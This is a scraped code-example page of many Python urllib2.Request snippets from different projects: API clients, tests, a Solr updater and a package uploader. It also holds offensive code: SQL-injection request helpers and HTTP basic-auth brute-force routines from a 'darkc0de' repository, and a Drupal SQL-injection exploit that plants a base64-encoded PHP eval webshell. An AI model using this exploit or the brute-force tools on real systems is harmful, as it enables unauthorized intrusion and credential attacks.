python类Request()的实例源码

STFDevicesControl.py 文件源码 项目:PhonePerformanceMeasure 作者: KyleCe 项目源码 文件源码 阅读 34 收藏 0 点赞 0 评论 0
def add_user_devices(self, serial):
        """Claim the device with the given serial for the current user.

        POSTs ``{"serial": serial}`` as JSON to ``<self.url>/api/v1/user/devices``
        with an ``Authorization`` header built from ``self.access_token`` and
        ``self.api_token``.

        Failures are reported on stdout and never raised: an HTTP error
        prints the status code and the response body, any other failure
        prints the exception itself.
        """
        api_url = self.url + "/api/v1/user/devices"
        token = self.access_token + " " + self.api_token

        request = urllib2.Request(api_url, json.dumps({'serial': serial}))
        request.add_header('Authorization', token)
        request.add_header('Content-Type', 'application/json')
        try:
            response = urllib2.urlopen(request)
        except urllib2.HTTPError as e:
            # Only HTTPError carries a status code and a readable body.
            print(e.code)
            print(e.read())
        except Exception as e:
            # URLError, socket errors, ...: these have no .code/.read(), so
            # printing those attributes would itself raise AttributeError.
            print(e)
        else:
            response.close()

    # ?????????
STFDevicesControl.py 文件源码 项目:PhonePerformanceMeasure 作者: KyleCe 项目源码 文件源码 阅读 33 收藏 0 点赞 0 评论 0
def remove_devices_user(self, device_list):
        """Release every device in ``device_list`` from the current user.

        For each entry, sends an HTTP DELETE to
        ``<self.url>/api/v1/user/devices/<serial>`` where ``<serial>`` is the
        entry's ``"serial"`` value. The request URL is printed before each call.

        Failures are reported on stdout and never raised, so one failing
        device does not stop the remaining ones: an HTTP error prints the
        status code and the response body, any other failure prints the
        exception itself.
        """
        # The token does not depend on the device, so build it once.
        token = self.access_token + " " + self.api_token
        for device in device_list:
            api_url = self.url + "/api/v1/user/devices/%s" % device["serial"]
            print(api_url)
            request = urllib2.Request(api_url)
            request.add_header('Authorization', token)
            # urllib2 picks GET/POST on its own; override the verb explicitly.
            request.get_method = lambda: 'DELETE'
            try:
                response = urllib2.urlopen(request)
            except urllib2.HTTPError as e:
                # Only HTTPError carries a status code and a readable body.
                print(e.code)
                print(e.read())
            except Exception as e:
                # URLError, socket errors, ...: no .code/.read() available.
                print(e)
            else:
                response.close()

    # ?????????
hippo.py 文件源码 项目:Cortex-Analyzers 作者: CERT-BDF 项目源码 文件源码 阅读 30 收藏 0 点赞 0 评论 0
def run(self):
        """Submit the observable to Hippocampe and report the decoded JSON reply.

        The value from ``self.getData()`` is sent as the single key of a JSON
        object whose value is ``{"type": self.data_type}``. HTTP errors and
        connection errors are passed to ``self.error``; anything else goes to
        ``self.unexpectedError``.
        """
        observable = self.getData()
        payload = json.dumps({observable: {"type": self.data_type}}).encode('utf-8')
        content_type = {'Content-Type': 'application/json'}

        try:
            endpoint = '{}/hippocampe/api/v1.0/{}'.format(self.url, self.service)
            reply = urllib2.urlopen(urllib2.Request(endpoint, payload, content_type))
            self.report(json.loads(reply.read()))
        except urllib2.HTTPError:
            # HTTPError must be tested before its base class URLError.
            self.error("Hippocampe: " + str(sys.exc_info()[1]))
        except urllib2.URLError:
            self.error("Hippocampe: service is not available")
        except Exception as e:
            self.unexpectedError(e)
tools.py 文件源码 项目:mongoaudit 作者: Exploit-install 项目源码 文件源码 阅读 35 收藏 0 点赞 0 评论 0
def send_result(email, result, title, urn):
    """
    Post the audit results as JSON to the mongoaud.it results endpoint.

    Args:
        email (str): address to send the results
        result (obj): results to send
        title (str): title sent along with the results
        urn (str): uniform resource name
    Returns:
        str: response body from the endpoint, or an apology message that
        includes the error text when the request fails with an HTTP or URL error
    """
    payload = {'email': email, 'result': result, 'title': title, 'urn': urn, 'date': get_date()}
    json_headers = {'Content-type': 'application/json',
                    'Accept': 'application/json'}
    try:
        request = urllib2.Request('https://mongoaud.it/results', json.dumps(payload), json_headers)
        return urllib2.urlopen(request).read()
    except (urllib2.HTTPError, urllib2.URLError) as exc:
        apology = "Sadly enough, we are having technical difficulties at the moment, " \
                  "please try again later.\n\n%s"
        return apology % str(exc)
test_glance.py 文件源码 项目:os-xenapi 作者: openstack 项目源码 文件源码 阅读 31 收藏 0 点赞 0 评论 0
def test_download_and_verify_ok(self, mock_urlopen):
        """Download succeeds when the header checksum equals the md5 hexdigest."""
        extract_tarball = self.mock_patch_object(
            self.glance.utils, 'extract_tarball')

        # Digest mock whose hexdigest() reports the expected checksum.
        digest = mock.Mock()
        digest.hexdigest.return_value = 'expect_cksum'
        md5_new = self.mock_patch_object(self.glance.md5, 'new', digest)

        # Response info mock whose getheader() reports the same checksum.
        response_info = mock.Mock()
        response_info.getheader.return_value = 'expect_cksum'
        mock_urlopen.return_value.info.return_value = response_info

        request = urllib2.Request('http://fakeurl.com')
        self.glance._download_tarball_and_verify(request, 'fake_staging_path')

        mock_urlopen.assert_called_with(request)
        extract_tarball.assert_called_once()
        md5_new.assert_called_once()
        response_info.getheader.assert_called_once()
        md5_new.return_value.hexdigest.assert_called_once()
test_glance.py 文件源码 项目:os-xenapi 作者: openstack 项目源码 文件源码 阅读 26 收藏 0 点赞 0 评论 0
def test_download_ok_verify_failed(self, mock_urlopen):
        """A checksum mismatch after the download raises RetryableError."""
        extract_tarball = self.mock_patch_object(
            self.glance.utils, 'extract_tarball')

        # Digest mock whose hexdigest() disagrees with the header value below.
        digest = mock.Mock()
        digest.hexdigest.return_value = 'unexpect_cksum'
        md5_new = self.mock_patch_object(self.glance.md5, 'new', digest)

        response_info = mock.Mock()
        response_info.getheader.return_value = 'expect_cksum'
        mock_urlopen.return_value.info.return_value = response_info

        request = urllib2.Request('http://fakeurl.com')
        self.assertRaises(
            self.glance.RetryableError,
            self.glance._download_tarball_and_verify,
            request, 'fake_staging_path')

        mock_urlopen.assert_called_with(request)
        extract_tarball.assert_called_once()
        md5_new.assert_called_once()
        md5_new.return_value.hexdigest.assert_called_once()
recipe-577909.py 文件源码 项目:code 作者: ActiveState 项目源码 文件源码 阅读 24 收藏 0 点赞 0 评论 0
def update(self, docs, commitwithin=None):
        """Post a list of docs to Solr; return the update URL and the status.

        Each doc is a mapping of field name to value; fields with a falsy
        value are left out of the request. Optionally tell Solr to
        "commitWithin" that many milliseconds.
        """
        url = self.url + '/update'

        root = etree.Element('add')
        if commitwithin is not None:
            root.set('commitWithin', str(commitwithin))

        for doc in docs:
            doc_node = etree.SubElement(root, 'doc')
            for name, raw in doc.iteritems():
                if not raw:
                    continue
                field_node = etree.Element('field', name=name)
                if isinstance(raw, unicode):
                    field_node.text = raw
                else:
                    field_node.text = str(raw)
                doc_node.append(field_node)

        request = urllib2.Request(url)
        request.add_header('Content-Type', 'text/xml; charset=utf-8')
        request.add_data(etree.tostring(root, pretty_print=True))
        reply = urllib2.urlopen(request).read()

        # The status is the text of the first 'lst/int' element of the reply.
        return url, etree.XML(reply).findtext('lst/int')
scraper.py 文件源码 项目:pi_romulus 作者: ArthurMoore85 项目源码 文件源码 阅读 30 收藏 0 点赞 0 评论 0
def _html_link_return(self, url, tag, key, value, deeper=False, second=False):
        """
        Fetch a page and return one link from it, prefixed with ``self.url``.

        The first ``tag`` element whose attribute ``key`` equals ``value``
        is used.

        :param url: URL to fetch; a leading '/' makes it relative to ``self.url``
        :param tag: Name of the tag to search for
        :param key: Name of the attribute to match on that tag
        :param value: Value expected for that attribute
        :param deeper: Use the href of the first <a> inside the matched tag
        :param second: Use the href of the second <a> inside the matched tag
            (only checked when ``deeper`` is false)
        :return: ``self.url`` followed by the selected href
        """
        if url.startswith('/'):
            url = '{0}{1}'.format(self.url, url)
        response = urllib2.urlopen(urllib2.Request(url))
        soup = BeautifulSoup(response, 'html.parser')
        # The attribute filter must be a dict; the former ``{key, value}`` was
        # a set literal and therefore did not filter on key == value.
        first = soup.findAll(tag, {key: value})[0]
        if deeper:
            href = first.findAll('a')[0]['href']
        elif second:
            anchors = first.findAll('a')
            href = anchors[1]['href']
            print(anchors)
        else:
            href = first['href']
        return '{0}{1}'.format(self.url, href)
distnet.py 文件源码 项目:SoCFoundationFlow 作者: mattaw 项目源码 文件源码 阅读 34 收藏 0 点赞 0 评论 0
def execute(self):
        """Upload the release file to the package server.

        Aborts through ``self.fatal`` when the release file is missing or
        when the server's reply is anything other than ``ok``.
        """
        if hasattr(Context.g_module, 'publish'):
            Context.Context.execute(self)
        mod = Context.g_module

        release_path = getattr(self, 'rfile', send_package_name())
        if not os.path.isfile(release_path):
            self.fatal('Create the release file with "waf release" first! %r' % release_path)

        form_fields = [
            ('pkgdata', Utils.readf(release_path, m='rb')),
            ('pkgname', mod.APPNAME),
            ('pkgver', mod.VERSION),
        ]
        encoded = safe_urlencode(form_fields)

        upload = Request(get_upload_url(), encoded)
        answer = urlopen(upload, timeout=TIMEOUT).read().strip()

        # On Python 3 the reply is bytes; decode before comparing with 'ok'.
        if sys.hexversion > 0x300000f:
            answer = answer.decode('utf-8')

        if answer != 'ok':
            self.fatal('Could not publish the package %r' % answer)
distnet.py 文件源码 项目:SoCFoundationFlow 作者: mattaw 项目源码 文件源码 阅读 29 收藏 0 点赞 0 评论 0
def compute_dependencies(self, filename=REQUIRES):
        """Resolve the requirements in ``filename`` into ``self.constraints``.

        Uses the package server unless ``--offline`` is on the command line;
        falls back to ``self.local_resolve`` when the server cannot be
        reached. ``self.check_errors()`` is called at the end in every case.
        """
        requirements = Utils.readf(filename)
        encoded = safe_urlencode([('text', requirements)])

        reply = None
        if '--offline' not in sys.argv:
            query = Request(get_resolve_url(), encoded)
            try:
                reply = urlopen(query, timeout=TIMEOUT)
            except URLError as e:
                Logs.warn('The package server is down! %r' % e)

        if reply is None:
            # Offline mode or unreachable server: resolve locally.
            self.constraints = self.local_resolve(requirements)
        else:
            ret = reply.read()
            try:
                ret = ret.decode('utf-8')
            except Exception:
                # Keep the undecoded reply when it cannot be decoded.
                pass
            self.trace(ret)
            self.constraints = parse_constraints(ret)
        self.check_errors()
distnet.py 文件源码 项目:SoCFoundationFlow 作者: mattaw 项目源码 文件源码 阅读 27 收藏 0 点赞 0 评论 0
def execute(self):
        """Upload the release file to the package server.

        Aborts through ``self.fatal`` when the release file is missing or
        when the server's reply is anything other than ``ok``.
        """
        if hasattr(Context.g_module, 'publish'):
            Context.Context.execute(self)
        mod = Context.g_module

        release_path = getattr(self, 'rfile', send_package_name())
        if not os.path.isfile(release_path):
            self.fatal('Create the release file with "waf release" first! %r' % release_path)

        form_fields = [
            ('pkgdata', Utils.readf(release_path, m='rb')),
            ('pkgname', mod.APPNAME),
            ('pkgver', mod.VERSION),
        ]
        encoded = safe_urlencode(form_fields)

        upload = Request(get_upload_url(), encoded)
        answer = urlopen(upload, timeout=TIMEOUT).read().strip()

        # On Python 3 the reply is bytes; decode before comparing with 'ok'.
        if sys.hexversion > 0x300000f:
            answer = answer.decode('utf-8')

        if answer != 'ok':
            self.fatal('Could not publish the package %r' % answer)
distnet.py 文件源码 项目:SoCFoundationFlow 作者: mattaw 项目源码 文件源码 阅读 32 收藏 0 点赞 0 评论 0
def compute_dependencies(self, filename=REQUIRES):
        """Resolve the requirements in ``filename`` into ``self.constraints``.

        Uses the package server unless ``--offline`` is on the command line;
        falls back to ``self.local_resolve`` when the server cannot be
        reached. ``self.check_errors()`` is called at the end in every case.
        """
        requirements = Utils.readf(filename)
        encoded = safe_urlencode([('text', requirements)])

        reply = None
        if '--offline' not in sys.argv:
            query = Request(get_resolve_url(), encoded)
            try:
                reply = urlopen(query, timeout=TIMEOUT)
            except URLError as e:
                Logs.warn('The package server is down! %r' % e)

        if reply is None:
            # Offline mode or unreachable server: resolve locally.
            self.constraints = self.local_resolve(requirements)
        else:
            ret = reply.read()
            try:
                ret = ret.decode('utf-8')
            except Exception:
                # Keep the undecoded reply when it cannot be decoded.
                pass
            self.trace(ret)
            self.constraints = parse_constraints(ret)
        self.check_errors()
distnet.py 文件源码 项目:SoCFoundationFlow 作者: mattaw 项目源码 文件源码 阅读 31 收藏 0 点赞 0 评论 0
def execute(self):
        """Upload the release file to the package server.

        Aborts through ``self.fatal`` when the release file is missing or
        when the server's reply is anything other than ``ok``.
        """
        if hasattr(Context.g_module, 'publish'):
            Context.Context.execute(self)
        mod = Context.g_module

        release_path = getattr(self, 'rfile', send_package_name())
        if not os.path.isfile(release_path):
            self.fatal('Create the release file with "waf release" first! %r' % release_path)

        form_fields = [
            ('pkgdata', Utils.readf(release_path, m='rb')),
            ('pkgname', mod.APPNAME),
            ('pkgver', mod.VERSION),
        ]
        encoded = safe_urlencode(form_fields)

        upload = Request(get_upload_url(), encoded)
        answer = urlopen(upload, timeout=TIMEOUT).read().strip()

        # On Python 3 the reply is bytes; decode before comparing with 'ok'.
        if sys.hexversion > 0x300000f:
            answer = answer.decode('utf-8')

        if answer != 'ok':
            self.fatal('Could not publish the package %r' % answer)
gather.py 文件源码 项目:SPF 作者: Exploit-install 项目源码 文件源码 阅读 27 收藏 0 点赞 0 评论 0
def search(self, url, offset=1, maxoffset=0, title=""):
        """Fetch ``url`` once per offset step and return the concatenated bodies.

        Every ``[[OFFSET]]`` placeholder in ``url`` is replaced with the
        current offset, which starts at 0 and grows by ``offset`` while it is
        <= ``maxoffset``. A URLError reports the failure and returns what has
        been collected so far; any other exception is printed and the loop
        moves on to the next offset.
        """
        collected = ""
        position = 0
        self.p.reset(title=title)
        while position <= maxoffset:
            self.p.rotate()
            page_url = url.replace('[[OFFSET]]', str(position))
            try:
                agent_header = {'User-Agent': self.user_agent}
                page_request = urllib2.Request(page_url, None, agent_header)
                collected += urllib2.urlopen(page_request).read()
            except urllib2.URLError:
                self.display.error("Could not access [%s]" % (title))
                return collected
            except Exception as e:
                print(e)
            position += offset
        self.p.done()
        return collected
trakt.py 文件源码 项目:plex-trakt-scrobbler 作者: cristianmiranda 项目源码 文件源码 阅读 26 收藏 0 点赞 0 评论 0
def _do_trakt_auth_post(self, url, data):
        """POST ``data`` to ``url`` with the session's bearer token.

        Returns the raw response body. An HTTPError is logged and re-raised.
        Note that this sets the process-wide default socket timeout to
        5 seconds.
        """
        try:
            bearer = self.get_session()
            auth_headers = {
                'Content-Type': 'application/json',
                'Authorization': 'Bearer ' + bearer,
                'trakt-api-version': '2',
                'trakt-api-key': self.CLIENT_ID
            }

            # Timeout in seconds; applies to every socket created afterwards.
            socket.setdefaulttimeout(5)

            body = urllib2.urlopen(urllib2.Request(url, data, auth_headers)).read()
            self.logger.info('Response: {0}'.format(body))
            return body
        except urllib2.HTTPError as e:
            self.logger.error('Unable to submit post data {url} - {error}'.format(url=url, error=e.reason))
            raise
darkTouch.py 文件源码 项目:darkc0de-old-stuff 作者: tuwid 项目源码 文件源码 阅读 33 收藏 0 点赞 0 评论 0
def pContent(url):
        """Collect link targets from the page at ``url`` into ``collected``.

        Every ``href="..."`` value found in the page is appended to the
        module-level list ``collected`` when it contains the module-level
        ``site`` string, contains '=', starts with '/', or contains
        'http://'.

        This is best-effort: any error while fetching or parsing is ignored
        and the function returns without adding further links.
        """
        global collected
        agent = 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)'
        try:
                request_web = urllib2.Request(url)
                request_web.add_header('User-Agent', agent)
                opener_web = urllib2.build_opener()
                text = opener_web.open(request_web).read()
                names = re.compile('(?<=href=")(.*?)(?=")').findall(text)
                opener_web.close()
                for name in names:
                        # The former "site in name and EXT in name" branch
                        # could never run: "site in name" alone already
                        # matched the first test.
                        if (site in name or '=' in name
                                        or name.startswith('/')
                                        or 'http://' in name):
                                collected.append(name)
        except Exception:
                # Deliberately ignored; unlike a bare except this still lets
                # KeyboardInterrupt and SystemExit through.
                pass
darkMySQLi.py 文件源码 项目:darkc0de-old-stuff 作者: tuwid 项目源码 文件源码 阅读 31 收藏 0 点赞 0 评论 0
def GetThatShit(head_URL):
        """Fetch head_URL through the rotating opener list and return the body.

        Every "+" in head_URL is first replaced with the global ``arg_eva``.
        Each attempt increments the global counters ``gets`` and
        ``proxy_num`` and uses the opener at ``proxy_num % proxy_len``.
        The loop repeats until a non-empty body has been read.

        Returns the body, or the empty string when an HTTPError ended the loop.
        KeyboardInterrupt/SystemExit and all other errors are re-raised.
        """
        source = ""
        global gets;global proxy_num
        head_URL = head_URL.replace("+",arg_eva)
        request_web = urllib2.Request(head_URL)
        request_web.add_header('User-Agent',agent)
        while len(source) < 1:
                if arg_debug == "on":
                        print "\n[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n"
                try:
                        # Counters are advanced before the request, so the
                        # opener used is the one at the new proxy_num.
                        gets+=1;proxy_num+=1
                        source = proxy_list[proxy_num % proxy_len].open(request_web).read()
                except (KeyboardInterrupt, SystemExit):
                        raise
                except (urllib2.HTTPError):
                        # NOTE(review): the message says "Trying again!" but
                        # the break below leaves the loop without retrying.
                        print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Trying again!"
                        print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n"
                        break
                except:
                        print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Look at the error and try to figure it out!"
                        print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n"
                        raise
        return source

#the guts and glory - Binary Algorithm that does all the guessing for the Blind Methodology
darkPGSQLi.py 文件源码 项目:darkc0de-old-stuff 作者: tuwid 项目源码 文件源码 阅读 27 收藏 0 点赞 0 评论 0
def GetThatShit(head_URL):
        """Fetch head_URL through the rotating opener list and return the body.

        Every "+" in head_URL is first replaced with the global ``arg_eva``.
        Each attempt increments the global counters ``gets`` and
        ``proxy_num`` and uses the opener at ``proxy_num % proxy_len``.
        The loop repeats until a non-empty body has been read.

        Returns the body, or the empty string when an HTTPError ended the loop.
        KeyboardInterrupt/SystemExit and all other errors are re-raised.
        """
        source = ""
        global gets;global proxy_num
        head_URL = head_URL.replace("+",arg_eva)
        request_web = urllib2.Request(head_URL)
        request_web.add_header('User-Agent',agent)
        while len(source) < 1:
                if arg_debug == "on":
                        print "\n[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n"
                try:
                        # Counters are advanced before the request, so the
                        # opener used is the one at the new proxy_num.
                        gets+=1;proxy_num+=1
                        source = proxy_list[proxy_num % proxy_len].open(request_web).read()
                except (KeyboardInterrupt, SystemExit):
                        raise
                except (urllib2.HTTPError):
                        # NOTE(review): the message says "Trying again!" but
                        # the break below leaves the loop without retrying.
                        print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Trying again!"
                        print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n"
                        break
                except:
                        print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Look at the error and try to figure it out!"
                        print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n"
                        raise
        return source

#say hello
cPanelbrute.py 文件源码 项目:darkc0de-old-stuff 作者: tuwid 项目源码 文件源码 阅读 28 收藏 0 点赞 0 评论 0
def getauth(url):
    """Return the ``www-authenticate`` header of the 401 reply for ``url``.

    Exits the process with status 1 when the request succeeds, when it fails
    with anything other than an HTTP 401, or when the 401 reply has no
    ``www-authenticate`` header.
    """
    try:
        handle = urllib2.urlopen(urllib2.Request(url))
    except IOError as err:
        # Keep the error: the 401 response is inspected below.
        failure = err
    else:
        print("This page isn't protected by basic authentication.\n")
        sys.exit(1)

    if getattr(failure, 'code', None) != 401:
        print("\nThis page isn't protected by basic authentication.")
        print('But we failed for another reason.\n')
        sys.exit(1)

    authline = failure.headers.get('www-authenticate', '')
    if authline:
        return authline

    print('\nA 401 error without a basic authentication response header - very weird.\n')
    sys.exit(1)
linksysbrute.py 文件源码 项目:darkc0de-old-stuff 作者: tuwid 项目源码 文件源码 阅读 36 收藏 0 点赞 0 评论 0
def run(self):
        """Request sys.argv[1] once with HTTP basic auth and report a success.

        The password comes from ``getword()`` and the user name from the
        module-level ``username``. When the request succeeds, the final URL
        and the response headers are printed and the process exits with
        status 2. HTTPError and socket.error are ignored silently.
        """
        password = getword()
        try:
            print "-"*12
            print "User:",username,"Password:",password
            req = urllib2.Request(sys.argv[1])
            # Password manager without a realm: the credentials apply to the
            # target URL whatever realm the server announces.
            passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
            passman.add_password(None, sys.argv[1], username, password)
            authhandler = urllib2.HTTPBasicAuthHandler(passman)
            opener = urllib2.build_opener(authhandler)
            fd = opener.open(req)
            print "\t\n\n[+] Login successful: Username:",username,"Password:",password,"\n"
            print "[+] Retrieved", fd.geturl()
            info = fd.info()
            for key, value in info.items():
                    print "%s = %s" % (key, value)
            # SystemExit is not caught by the handler below.
            sys.exit(2)
        except (urllib2.HTTPError,socket.error):
            pass
webauthbrute.py 文件源码 项目:darkc0de-old-stuff 作者: tuwid 项目源码 文件源码 阅读 38 收藏 0 点赞 0 评论 0
def getauth(url):
    """Return the ``www-authenticate`` header of the 401 reply for ``url``.

    Exits the process with status 1 when the request succeeds, when it fails
    with anything other than an HTTP 401, or when the 401 reply has no
    ``www-authenticate`` header.
    """
    try:
        handle = urllib2.urlopen(urllib2.Request(url))
    except IOError as err:
        # Keep the error: the 401 response is inspected below.
        failure = err
    else:
        print("This page isn't protected by basic authentication.\n")
        sys.exit(1)

    if getattr(failure, 'code', None) != 401:
        print("\nThis page isn't protected by basic authentication.")
        print('But we failed for another reason.\n')
        sys.exit(1)

    authline = failure.headers.get('www-authenticate', '')
    if authline:
        return authline

    print('\nA 401 error without an basic authentication response header - very weird.\n')
    sys.exit(1)
webauthbrute.py 文件源码 项目:darkc0de-old-stuff 作者: tuwid 项目源码 文件源码 阅读 31 收藏 0 点赞 0 评论 0
def run(self):
        """Request sys.argv[1] once with HTTP basic auth and report a success.

        The user name and password both come from ``getword()``. When the
        request succeeds, the final URL and the response headers are printed
        and the process exits with status 2. HTTPError, BadStatusLine and
        socket.error are printed and otherwise ignored.
        """
        username, password = getword()
        try:
            print "-"*12
            print "User:",username,"Password:",password
            req = urllib2.Request(sys.argv[1])
            # Password manager without a realm: the credentials apply to the
            # target URL whatever realm the server announces.
            passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
            passman.add_password(None, sys.argv[1], username, password)
            authhandler = urllib2.HTTPBasicAuthHandler(passman)
            opener = urllib2.build_opener(authhandler)
            fd = opener.open(req)
            print "\t\n\nUsername:",username,"Password:",password,"----- Login successful!!!\n\n"
            print "Retrieved", fd.geturl()
            info = fd.info()
            for key, value in info.items():
                    print "%s = %s" % (key, value)
            # SystemExit is not caught by the handler below.
            sys.exit(2)
        except (urllib2.HTTPError, httplib.BadStatusLine,socket.error), msg:
            print "An error occurred:", msg
            pass
springenwerk.py 文件源码 项目:darkc0de-old-stuff 作者: tuwid 项目源码 文件源码 阅读 28 收藏 0 点赞 0 评论 0
def getURLContents(self, url, data=None):    
        "Returns the contents of the given URL as an Unicode string" 

        s = ""
        success = False

        req = Request(url, data, {'User-agent': self.useragent})

        try:
            f = urlopen(req)  
            s = f.read()
            f.close()
            success = True
        except HTTPError, e:
            print 'Server error: ', e.code
            if (self.verbose and BaseHTTPRequestHandler.responses.has_key(e.code)):
                title, msg = BaseHTTPRequestHandler.responses[e.code]            
                print title + ": " + msg
        except URLError, e:
            print 'Connection error: ', e.reason

        dammit = UnicodeDammit(s)    

        return (success, dammit.unicode)
AfricasTalkingGateway.py 文件源码 项目:Twitter-Sentiment-Analysis 作者: crakama 项目源码 文件源码 阅读 24 收藏 0 点赞 0 评论 0
def sendRequest(self, urlString, data_ = None):
        """Send a request to ``urlString`` and return the response body.

        When ``data_`` is given it is URL-encoded and sent as the request
        body; otherwise no body is sent. The status code is stored in
        ``self.responseCode``. Any failure while building or sending the
        request is re-raised as AfricasTalkingGatewayException.
        """
        try:
            if data_ is None:
                request = urllib2.Request(urlString, headers = self.headers)
            else:
                encoded = urllib.urlencode(data_)
                request = urllib2.Request(urlString, encoded, headers = self.headers)
            reply = urllib2.urlopen(request)
        except Exception as e:
            raise AfricasTalkingGatewayException(str(e))

        self.responseCode = reply.getcode()
        body = reply.read()
        if self.Debug:
            print(body)
        return body
AfricasTalkingGateway.py 文件源码 项目:Twitter-Sentiment-Analysis 作者: crakama 项目源码 文件源码 阅读 27 收藏 0 点赞 0 评论 0
def sendRequest(self, urlString, data_ = None):
        """Send a request to ``urlString`` and return the response body.

        When ``data_`` is given it is URL-encoded and sent as the request
        body; otherwise no body is sent. The status code is stored in
        ``self.responseCode``. Any failure while building or sending the
        request is re-raised as AfricasTalkingGatewayException.
        """
        try:
            if data_ is None:
                request = urllib2.Request(urlString, headers = self.headers)
            else:
                encoded = urllib.urlencode(data_)
                request = urllib2.Request(urlString, encoded, headers = self.headers)
            reply = urllib2.urlopen(request)
        except Exception as e:
            raise AfricasTalkingGatewayException(str(e))

        self.responseCode = reply.getcode()
        body = reply.read()
        if self.Debug:
            print(body)
        return body
__init__.py 文件源码 项目:Tinychat-Bot--Discontinued 作者: Tinychat 项目源码 文件源码 阅读 31 收藏 0 点赞 0 评论 0
def getAMFRequest(self, requests):
        """
        Builds an AMF request L{Envelope<pyamf.remoting.Envelope>} from a
        supplied list of requests.

        Each request is stored in the envelope under its ``id``; the
        envelope's headers are set to ``self.headers``.
        """
        envelope = remoting.Envelope(self.amf_version)

        if self.logger:
            self.logger.debug('AMF version: %s' % self.amf_version)

        for pending in requests:
            envelope[pending.id] = remoting.Request(
                str(pending.service), list(pending.args))

        envelope.headers = self.headers
        return envelope
def exploit(cls, args):
        """Proof-of-concept check; records the outcome in ``args`` and returns it.

        Reads the target URL from ``args['options']['target']``, sends two
        requests to it and sets ``args['success']``. On success the
        ``args['poc_ret']`` entries are filled in as well.

        NOTE(review): this sends an attack payload to the target; it must
        only be run against systems you are explicitly authorized to test.
        """
        url = args['options']['target']
        webshell_url = url + '/?q=<?php%20eval(base64_decode(ZXZhbCgkX1BPU1RbZV0pOw));?>'
        payload = "name[0;insert into menu_router (path,  page_callback, access_callback, " \
                  "include_file, load_functions, to_arg_functions, description) values ('<" \
                  "?php eval(base64_decode(ZXZhbCgkX1BPU1RbZV0pOw));?>','php_eval', '1', '" \
                  "modules/php/php.module', '', '', '');#]=test&name[0]=test2&pass=test&fo" \
                  "rm_id=user_login_block"

        if args['options']['verbose']:
            print '[*] Request URL: ' + url
            print '[*] POST Content: ' + payload

        urllib2.urlopen(url, data=payload)
        request = urllib2.Request(webshell_url, data="e=echo strrev(gwesdvjvncqwdijqiwdqwduhq);")
        response = urllib2.urlopen(request).read()

        # Success means the reversed marker string appears in the response.
        if 'gwesdvjvncqwdijqiwdqwduhq'[::-1] in response:
            args['success'] = True
            args['poc_ret']['vul_url'] = url
            args['poc_ret']['Webshell'] = webshell_url
            args['poc_ret']['Webshell_PWD'] = 'e'
            return args
        args['success'] = False
        return args
common.py 文件源码 项目:malware 作者: JustF0rWork 项目源码 文件源码 阅读 26 收藏 0 点赞 0 评论 0
def retrieve_content(url, data=None):
    """
    Retrieves page content from given URL

    Spaces after the first '?' (or anywhere, when the URL has no '?') are
    sent as "%20". A gzip- or deflate-encoded response is decompressed
    before it is returned.

    Never raises: on failure the result is the error's body when it has
    one, otherwise its ``msg`` attribute, otherwise the empty string.
    """

    try:
        # Escape spaces only in the part after the first '?'. find() returns
        # -1 when there is none, which makes the whole URL the escaped part.
        # Doing the lookup once avoids a scan of the URL per character.
        query_start = url.find('?') + 1
        escaped = url[:query_start] + url[query_start:].replace(' ', "%20")

        req = urllib2.Request(escaped, data, {"User-agent": NAME, "Accept-encoding": "gzip, deflate"})
        resp = urllib2.urlopen(req, timeout=TIMEOUT)
        retval = resp.read()
        encoding = resp.headers.get("Content-Encoding")

        if encoding:
            if encoding.lower() == "deflate":
                # Negative window size: raw deflate stream without a zlib header.
                stream = StringIO.StringIO(zlib.decompress(retval, -15))
            else:
                stream = gzip.GzipFile("", "rb", 9, StringIO.StringIO(retval))
            retval = stream.read()
    except Exception as ex:
        retval = ex.read() if hasattr(ex, "read") else getattr(ex, "msg", str())

    return retval or ""
rest_client.py 文件源码 项目:networking-bigswitch-l3-pe 作者: DeNADev 项目源码 文件源码 阅读 27 收藏 0 点赞 0 评论 0
def _rest_request(self, url, data, session, verb):
        """Send one REST call and return ``(status code, response body)``.

        ``verb`` is used as the HTTP method. When ``session`` is truthy it
        is sent as the ``session_cookie`` cookie. The request and the
        (possibly truncated) response are written to the debug log.

        Raises BCFRestError when the status code is outside 200-299.
        """
        headers = {'Content-type': 'application/json'}
        if session:
            headers["Cookie"] = "session_cookie=%s" % session
        LOG.debug("verb:%(verb)s url:%(url)s "
                  "headers:%(headers)s data:%(data)s",
                  {'verb': verb, 'url': url,
                   'headers': headers, 'data': data})

        request = urllib2.Request(url, data, headers)
        # urllib2 only chooses between GET and POST; force the given verb.
        request.get_method = lambda: verb
        response = urllib2.urlopen(request)
        code = response.code
        result = response.read()

        # Long bodies are logged on one line, cut to LOG_STRING_LEN characters.
        if len(result) > LOG_STRING_LEN:
            log_result = result.replace("\n", "")[:LOG_STRING_LEN] + " ..."
        else:
            log_result = result
        LOG.debug("code:%(code)s result:%(result)s",
                  {'code': code, 'result': log_result})

        if not 200 <= code < 300:
            raise BCFRestError(code=code, result=result,
                               method=verb, url=url, data=data)
        return (code, result)
checkpoint.py 文件源码 项目:instagram_private_api 作者: ping 项目源码 文件源码 阅读 37 收藏 0 点赞 0 评论 0
def respond_to_checkpoint(self, response_code):
        """Post ``response_code`` to the checkpoint endpoint.

        The form also carries ``self.csrftoken``. A gzip-encoded response
        is decompressed before decoding.

        Returns a tuple of the HTTP status code and the response body
        decoded as UTF-8.
        """
        headers = {
            'User-Agent': self.USER_AGENT,
            'Origin': 'https://i.instagram.com',
